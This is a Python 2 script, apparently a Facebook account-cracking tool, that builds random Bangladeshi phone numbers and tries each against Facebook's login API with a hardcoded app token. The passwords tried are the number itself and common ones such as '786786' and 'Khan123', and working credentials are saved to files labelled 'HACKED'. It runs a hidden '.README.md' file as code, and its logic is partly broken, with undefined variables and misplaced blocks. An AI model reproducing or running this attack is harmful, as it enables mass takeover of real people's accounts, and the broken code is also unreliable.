import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(40000):
    nmbr = random.randint(111111, 999999)
    sys.stdout = open('.txt', 'a')
    print nmbr
    sys.stdout.flush()

try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')
    time.sleep(1)
    os.system('python2 .README.md')

from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]

def exb():
    print '[!] Exit Successfully'
    os.sys.exit()


def exxb():
    print '[!] \x1b[1;91mTHIS OPTION NOT AVAILABLE AT THE MOMENT.BUT \x1b[3;92;40m COM\x1b[1;95mING SO\x1b[1;97mON \x1b[1;91m\x1b[0;34;40m'
    os.sys.exit()


def psb(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(3.0 / 200)


def tik():
    titik = [
     '   ', '.  ', '.. ', '...', '.. ', '.  ', '   ']
    for o in titik:
        print '\r\x1b[1;91m     [\xe2\x97\x8f] \x1b[1;92mLoa\x1b[1;90mding \x1b[1;97m' + o,
        sys.stdout.flush()
        time.sleep(0.10)


def lodhirt():
    lodhirt = [
     'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND', '      ', 'SOMI BRAND\n']
    for o in lodhirt:
        print '\r\x1b[1;94m                     \x1b[1;92m' + o,
        sys.stdout.flush()
        time.sleep(0.1)


def jaalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(2.0 / 9900)


def t():
    time.sleep(1)


def cb():
 os.system('clear')
logo = """
 \033[1;92m /    /~\  |\  /| | 
 \033[1;91m/    /   \ | \/ | | 
\033[1;93m/____ \   / | /\ | | 
  \033[1;94m  /  \ /  |/  \| | 
 \033[1;95m  /   / \  |    | | 
\033[1;96m  /   /   \ |    | | 

"""
logo1 = """
\033[1;91m  ___             
\033[1;92m / _ \            
\033[1;93m/ /_\ \ _ __ ___  
\033[1;94m|  _  || '_ ` _ \ 
\033[1;95m| | | || | | | | |
\033[1;96m\_| |_/|_| |_| |_|
\033[1;91m ______   _______  _______  _        ______  
\033[1;92m(  ___ \ (  ____ )(  ___  )( (    /|(  __  \ 
\033[1;93m| (   ) )| (    )|| (   ) ||  \  ( || (  \  )
\033[1;96m| (__/ / | (____)|| (___) ||   \ | || |   ) |
\033[1;94m|  __ (  |     __)|  ___  || (\ \) || |   | |
\033[1;95m| (  \ \ | (\ (   | (   ) || | \   || |   ) |
\033[1;91m| )___) )| ) \ \__| )   ( || )  \  || (__/  )
\033[1;92m|/ \___/ |/   \__/|/     \||/    )_)(______/ 
                                             
                  
                  

\033[1;47m\033[1;31m          SELECT INDIAN SIM CODE               \033[1;0m   

\033[1;97m CODE\033[1;92m (1)\033[1;96m 9540 TO 9970 

"""




back = 0
back = 0
successful = []
cpb = []
oks = []
id = []

def menu():
    os.system('clear')
    print logo
    print
    print 47* '\033[1;94m='
    print
    psb('\x1b[1;91m[\x1b[1;92m01\x1b[1;91m]\x1b[1;93m BANGLADESH \x1b[1;91m[\x1b[1;92m02\x1b[1;91m]\x1b[1;95m AMERICA')
    psb('\x1b[1;91m[\x1b[1;92m03\x1b[1;91m]\x1b[1;94m UK                         \x1b[1;91m[\x1b[1;92m04\x1b[1;91m]\x1b[1;93m INDIA')
    psb('\x1b[1;91m[\x1b[1;92m05\x1b[1;91m]\x1b[1;92m BRAZIL               \x1b[1;91m[\x1b[1;92m06\x1b[1;91m]\x1b[1;96m JAPAN')
    psb('\x1b[1;91m[\x1b[1;92m07\x1b[1;91m]\x1b[1;96m KOREA                \x1b[1;91m[\x1b[1;92m08\x1b[1;91m]\x1b[1;91m ITLY')
    psb('\x1b[1;91m[\x1b[1;92m09\x1b[1;91m]\x1b[1;91m SPAIN                  \x1b[1;91m[\x1b[1;92m10\x1b[1;91m]\x1b[1;92m POLAND')
    psb('\x1b[1;91m[\x1b[1;92m11\x1b[1;91m]\x1b[1;95m PAKISTAN          \x1b[1;91m[\x1b[1;92m12\x1b[1;91m]\x1b[1;94m INDONESIA')
    psb('\x1b[1;91m[\x1b[1;92m13\x1b[1;91m]\x1b[1;94m PERU                    \x1b[1;91m[\x1b[1;92m14\x1b[1;91m]\x1b[1;95m AUSTRALIA')
    psb('\x1b[1;91m[\x1b[1;92m15\x1b[1;91m]\x1b[1;96m CANADA             \x1b[1;91m[\x1b[1;92m16\x1b[1;91m]\x1b[1;93m CHINA')
    psb('\x1b[1;91m[\x1b[1;92m17\x1b[1;91m]\x1b[1;93m DENMARK          \x1b[1;91m[\x1b[1;92m18\x1b[1;91m]\x1b[1;96m FRANCE')
    psb('\x1b[1;91m[\x1b[1;92m19\x1b[1;91m]\x1b[1;92m GERMANY          \x1b[1;91m[\x1b[1;92m20\x1b[1;91m]\x1b[1;91m MALAYSIA')
    psb('\x1b[1;91m[\x1b[1;92m21\x1b[1;91m]\x1b[1;95m SARI LANKA      \x1b[1;91m[\x1b[1;92m22\x1b[1;91m]\x1b[1;94m TURKEY')
    psb('\x1b[1;91m[\x1b[1;92m23\x1b[1;91m]\x1b[1;96m U.A.E                     \x1b[1;91m[\x1b[1;92m24\x1b[1;91m]\x1b[1;95m SAUDIA ARABIA')
    psb('\x1b[1;91m[\x1b[1;92m26\x1b[1;91m]\x1b[1;93m ISRIL                     \x1b[1;91m[\x1b[1;92m26\x1b[1;91m]\x1b[1;92m IRAN')
    psb('                                                            \x1b[1;91m[\x1b[1;92m00\x1b[1;91m]\x1b[1;93m CLOSE ')
    print
    print 47* '\033[1;94m='
    action()


def action():
    global oks
    global cpb
    Somi = raw_input('\n\n \x1b[1;96m>   ')
    if Somi == '':
        print '[!] STAR BOY WARNING'
        action()
    elif lovehackerx =="1":
                print (logo)
		os.system("clear")
		print (logo)
		print("\033[1;93m175,165,191, 192, 193, 194, 195, 196, 197, 198, 199n")
		try:
			c = raw_input("\033[1;95m choose code  : ")
			k="+880"
			idlist = ('.txt')
			for line in open(idlist,"r").readlines():
				id.append(line.strip())
		except IOError:
			print ("[!] File Not Found")
			raw_input("\n[ Back ]")
			blackmafiax()
	
		login()
		
    else:
        print '[!] WARNING STAR BOY'
        action()
    print 47* '\033[1;97m='
    xxx = str(len(id))
    psb('[\xe2\x9c\x93]\033[1;92m TOTAL NUMBERS: ' + xxx)
    time.sleep(0.5)
    psb('[\xe2\x9c\x93]\033[1;93m PLEASE WAIT, PROCESS IS START...')
    time.sleep(0.5)
    psb('[!]\033[1;96m TO STOP THIS PROCESS PRESS Ctrl THEN z')
    time.sleep(0.5)
    print 47* '\033[1;97m='
    print

    def main(arg):
        user = arg
        try:
            os.mkdir('save')
        except OSError:
            pass

        try:
            pass1 = user
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(k + c + user + '|' + pass1 + '\n')
                okb.close()
                oks.append(c + user + pass1)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass1 + '\n'
                cps = open('save/checkpoint.txt', 'a')
                cps.write(k + c + user + '|' + pass1 + '\n')
                cps.close()
                cpb.append(c + user + pass1)
            else:
                pass2 = '786786786'
                data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                q = json.load(data)
                if 'access_token' in q:
                    print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n' + '\n'
                    okb = open('save/successfull.txt', 'a')
                    okb.write(k + c + user + '|' + pass2 + '\n')
                    okb.close()
                    oks.append(c + user + pass2)
                elif 'www.facebook.com' in q['error_msg']:
                    print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass2 + '\n'
                    cps = open('save/checkpoint.txt', 'a')
                    cps.write(k + c + user + '|' + pass2 + '\n')
                    cps.close()
                    cpb.append(c + user + pass2)
                else:
                    pass3 = '786786'
                    data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                    q = json.load(data)
                    if 'access_token' in q:
                        print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n' + '\n'
                        okb = open('save/successfull.txt', 'a')
                        okb.write(k + c + user + '|' + pass3 + '\n')
                        okb.close()
                        oks.append(c + user + pass3)
                    elif 'www.facebook.com' in q['error_msg']:
                        print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass3 + '\n'
                        cps = open('save/checkpoint.txt', 'a')
                        cps.write(k + c + user + '|' + pass3 + '\n')
                        cps.close()
                        cpb.append(c + user + pass3)
                    else:
                        pass4 = '000786'
                        data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
                        q = json.load(data)
                        if 'access_token' in q:
                            print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n' + '\n'
                            okb = open('save/successfull.txt', 'a')
                            okb.write(k + c + user + '|' + pass4 + '\n')
                            okb.close()
                            oks.append(c + user + pass4)
                        elif 'www.facebook.com' in q['error_msg']:
                            print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass4 + '\n'
                            cps = open('save/checkpoint.txt', 'a')
                            cps.write(k + c + user + '|' + pass4 + '\n')
                            cps.close()
                            cpb.append(c + user + pass4)
                            pass5 = 'Khan123'
            data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' + k + c + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
            q = json.load(data)
            if 'access_token' in q:
                print '\x1b[1;94m[HAC\x1b[1;92mKED] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n' + '\n'
                okb = open('save/successfull.txt', 'a')
                okb.write(k + c + user + '|' + pass5 + '\n')
                okb.close()
                oks.append(c + user + pass5)
            elif 'www.facebook.com' in q['error_msg']:
                print '\x1b[1;91m[AFTER 7DAYS] \x1b[1;93m  ' + k + c + user + '\x1b[1;94m | \x1b[1;96m' + pass5 + '\n'
                cps = open('save/checkpoint.txt', 'a')
                cps.write(k + c + user + '|' + pass5 + '\n')
                cps.close()
                cpb.append(c + user + pass5)
            
                
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print 50 * '-'
    print '[\xe2\x9c\x93] \x1b[1;96mPROCESS HAS BEEN COMPLETED....'
    print '[\xe2\x9c\x93] \x1b[1;96mTOTAL HACKED/CHECKPOINT : ' + str(len(oks)) + '/' + str(len(cpb))
    print '[\xe2\x9c\x93] \x1b[1;96mCP FILE HAS BEEN SAVED : save/checkpoint.txt'
    raw_input('\n[\x1b[1;96mPRESS ENTER TO GO BACK]')
    os.system('python2 .README.md')


if __name__ == '__main__':
    menu()
